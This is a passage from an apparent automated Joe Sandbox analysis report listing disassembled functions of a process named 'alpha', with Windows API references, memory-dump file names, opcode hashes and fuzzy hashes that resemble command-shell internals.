                                                      • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF7E1DBE626,?,?,00000000,00007FF7E1DC1F69), ref: 00007FF7E1DBF1FF
                                                      • iswdigit.MSVCRT(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DBF2BB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: iswdigit$iswspacewcschr
                                                      • String ID: )$=,;
                                                      • API String ID: 1959970872-2167043656
                                                      • Opcode ID: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                      • Instruction ID: 92445d58be493c0738966425aa818ac15ae460294155582004917e81484774d5
                                                      • Opcode Fuzzy Hash: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                      • Instruction Fuzzy Hash: 4C41BF65E08613A5FB68FB14E9567B9FAE0FF11741FC49033C98E421A4CFBCA4518663
                                                      Function 00007FF7E1DD91B8 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _wcsnicmpfprintfwcsrchr
                                                      • String ID: CMD Internal Error %s$%s$Null environment
                                                      • API String ID: 3625580822-2781220306
                                                      • Opcode ID: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                      • Instruction ID: 03d7c0735fffd5f53cfaea4bd22cf636bf4420db2bd8f9d9c85b00f77e0cabcf
                                                      • Opcode Fuzzy Hash: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                      • Instruction Fuzzy Hash: C5311421A0864292FB18FF42A5823B9F660FF05B94FC44232CD1E17795DEBDE451C362
                                                      Function 00007FF7E1DC1FAC Relevance: 9.3, APIs: 6, Instructions: 260COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memsetwcsspn
                                                      • String ID:
                                                      • API String ID: 3809306610-0
                                                      • Opcode ID: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                      • Instruction ID: 90ce8880221803b5071dce55d7de14cc495f08aff95ec84a1fc5879b0cd69bb1
                                                      • Opcode Fuzzy Hash: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                      • Instruction Fuzzy Hash: E7B1B162A08B5681EB10EF15E452379E7A1FB88B80FC48437DA4E47794DFBCE841C762
                                                      Function 00007FF7E1DD8C18 Relevance: 9.1, APIs: 6, Instructions: 145COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcschr$iswdigit$wcstol
                                                      • String ID:
                                                      • API String ID: 3841054028-0
                                                      • Opcode ID: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                      • Instruction ID: 4ed3a6bedc4438e92169f84671751e815ed387384a95442d6079da41c01b9af9
                                                      • Opcode Fuzzy Hash: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                      • Instruction Fuzzy Hash: 5851D526A0465295EB25EB1998023B9B6A1FFA8751BC4C333DE5D422D4DF7CE4A1C321
                                                      Function 00007FF7E1DB5984 Relevance: 9.1, APIs: 6, Instructions: 142COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DD3687
                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7E1DB260D), ref: 00007FF7E1DD36A6
                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7E1DB260D), ref: 00007FF7E1DD36EB
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DD3703
                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7E1DB260D), ref: 00007FF7E1DD3722
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Console$Write_get_osfhandle$Mode
                                                      • String ID:
                                                      • API String ID: 1066134489-0
                                                      • Opcode ID: 989124be994080129bedea4b9ae1d4c283fccc3ce7243235c73d6b8a7e8f68c3
                                                      • Instruction ID: b0b5e6ca0c9c84154818d49e409d49587f767dd62dc9b7946b37bb0775524492
                                                      • Opcode Fuzzy Hash: 989124be994080129bedea4b9ae1d4c283fccc3ce7243235c73d6b8a7e8f68c3
                                                      • Instruction Fuzzy Hash: B451A6A5B08642B7EB24EF11A40677AE691FF44790F884536DE0E43790DFBCE441CB22
                                                      Function 00007FF7E1DB89C0 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$DriveErrorInformationLastTypeVolume
                                                      • String ID:
                                                      • API String ID: 850181435-0
                                                      • Opcode ID: e30f486a492b6204ca4cfe222f6522b4387915627d195f2e6e30a15257811e7a
                                                      • Instruction ID: aed5a1d0e40115584a3ea4acc74fdf75245e7e14bf6fbf7e08957f454d84217e
                                                      • Opcode Fuzzy Hash: e30f486a492b6204ca4cfe222f6522b4387915627d195f2e6e30a15257811e7a
                                                      • Instruction Fuzzy Hash: E641AE32A08BC1D9E720DF20D8453EAB7A0FB89B85F948436DA4E8BB48CF78D555C711
                                                      Function 00007FF7E1DC34A0 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DC3578: _get_osfhandle.MSVCRT ref: 00007FF7E1DC3584
                                                        • Part of subcall function 00007FF7E1DC3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC359C
                                                        • Part of subcall function 00007FF7E1DC3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35C3
                                                        • Part of subcall function 00007FF7E1DC3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35D9
                                                        • Part of subcall function 00007FF7E1DC3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35ED
                                                        • Part of subcall function 00007FF7E1DC3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC3602
                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF7E1DC3491,?,?,?,00007FF7E1DD4420), ref: 00007FF7E1DC3514
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DC3522
                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF7E1DC3491,?,?,?,00007FF7E1DD4420), ref: 00007FF7E1DC3541
                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF7E1DC3491,?,?,?,00007FF7E1DD4420), ref: 00007FF7E1DC355E
                                                        • Part of subcall function 00007FF7E1DC36EC: _get_osfhandle.MSVCRT ref: 00007FF7E1DC3715
                                                        • Part of subcall function 00007FF7E1DC36EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7E1DC3770
                                                        • Part of subcall function 00007FF7E1DC36EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DC3791
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                                      • String ID:
                                                      • API String ID: 4057327938-0
                                                      • Opcode ID: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                      • Instruction ID: 3e8545ec3fa823a1cc6534d335d4c92bceff4caa43f4ce7bc51b22a9974401df
                                                      • Opcode Fuzzy Hash: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                      • Instruction Fuzzy Hash: 9731E421F0CA02A6E754FB25940227DFAA0EF89741FC48536D90E83391DEBCE804C761
                                                      Function 00007FF7E1DDBE30 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 60COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                                                      • String ID: KEYS$LIST$OFF
                                                      • API String ID: 411561164-4129271751
                                                      • Opcode ID: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                                      • Instruction ID: 15e4f702a6037c5ad8a72fc2028f27eaf1e032af54674989ea782079be31238f
                                                      • Opcode Fuzzy Hash: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                                      • Instruction Fuzzy Hash: D9212121E08A0291F718FB25A883379E661FB85795FC0D737C61E872E5DEFCA4448662
                                                      Function 00007FF7E1DC01B8 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DC01C4
                                                      • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7E1DCE904,?,?,?,?,00000000,00007FF7E1DC3491,?,?,?,00007FF7E1DD4420), ref: 00007FF7E1DC01D6
                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF7E1DCE904,?,?,?,?,00000000,00007FF7E1DC3491,?,?,?,00007FF7E1DD4420), ref: 00007FF7E1DC0212
                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7E1DCE904,?,?,?,?,00000000,00007FF7E1DC3491,?,?,?,00007FF7E1DD4420), ref: 00007FF7E1DC0228
                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF7E1DCE904,?,?,?,?,00000000,00007FF7E1DC3491,?,?,?,00007FF7E1DD4420), ref: 00007FF7E1DC023C
                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7E1DCE904,?,?,?,?,00000000,00007FF7E1DC3491,?,?,?,00007FF7E1DD4420), ref: 00007FF7E1DC0251
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                      • String ID:
                                                      • API String ID: 513048808-0
                                                      • Opcode ID: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                      • Instruction ID: fcc2b7138fe407a521bbb367d3afd937f49e7710b4aa7d2889eb9aba7bbcaabe
                                                      • Opcode Fuzzy Hash: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                      • Instruction Fuzzy Hash: 8921A125D0CB8687E750EB60A58633DFA90FF49755F944636EA0E42294CEFCE448C762
                                                      Function 00007FF7E1DC9584 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                      • String ID:
                                                      • API String ID: 4104442557-0
                                                      • Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                      • Instruction ID: 1b7cf3d63c506e47a0a5d4220de52bad170906b5e5309d3ed5c3393c0eb9847c
                                                      • Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                      • Instruction Fuzzy Hash: EC115122A04F419AEB04EF60E8453B973A4FB09759F801A35EA6D87B94DFBCD5A4C350
                                                      Function 00007FF7E1DC3578 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DC3584
                                                      • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC359C
                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35C3
                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35D9
                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35ED
                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC3602
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                      • String ID:
                                                      • API String ID: 513048808-0
                                                      • Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                      • Instruction ID: 8a8311c55baeaf48295a52ea22bb0b5ee0846ee12747625b4b049beb90639026
                                                      • Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                      • Instruction Fuzzy Hash: B7119331E08A42A3EB14EB24A546278FAA0FF49765F849736D92F433D0CEBCE444C752
                                                      Function 00007FF7E1DD711C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 175COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7E1DD71F9
                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7E1DD720D
                                                      • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7E1DD7300
                                                        • Part of subcall function 00007FF7E1DD5740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF7E1DD75C4,?,?,00000000,00007FF7E1DD6999,?,?,?,?,?,00007FF7E1DC8C39), ref: 00007FF7E1DD5744
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: OpenSemaphore$CloseErrorHandleLast
                                                      • String ID: _p0$wil
                                                      • API String ID: 455305043-1814513734
                                                      • Opcode ID: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                      • Instruction ID: a8d8c3b1667c7a5913d32aa9d24931708e1ac1dc36b80d8ecbecefb97def6430
                                                      • Opcode Fuzzy Hash: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                      • Instruction Fuzzy Hash: D461E362B1868281EF25EF65D4523B9A3A1FF84B94FD44673DA0E47784EFBCE5018321
                                                      Function 00007FF7E1DB1DC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 139COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcschr$Heapiswspacememset$AllocProcess
                                                      • String ID: %s
                                                      • API String ID: 2401724867-3043279178
                                                      • Opcode ID: 740c75b15b64cf7ac9eb9688b57878eb6de44e609a22920e9cf606d70b52c251
                                                      • Instruction ID: b426d9c9fc565690cd39e0946b6752279f584e9e770a3dcd66dc0ea9e7be16a0
                                                      • Opcode Fuzzy Hash: 740c75b15b64cf7ac9eb9688b57878eb6de44e609a22920e9cf606d70b52c251
                                                      • Instruction Fuzzy Hash: FF51E572A0868695EB21EF21D8027F9B3A0FB49B84F844136DE4D47794EFBCE050C762
                                                      Function 00007FF7E1DBE260 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
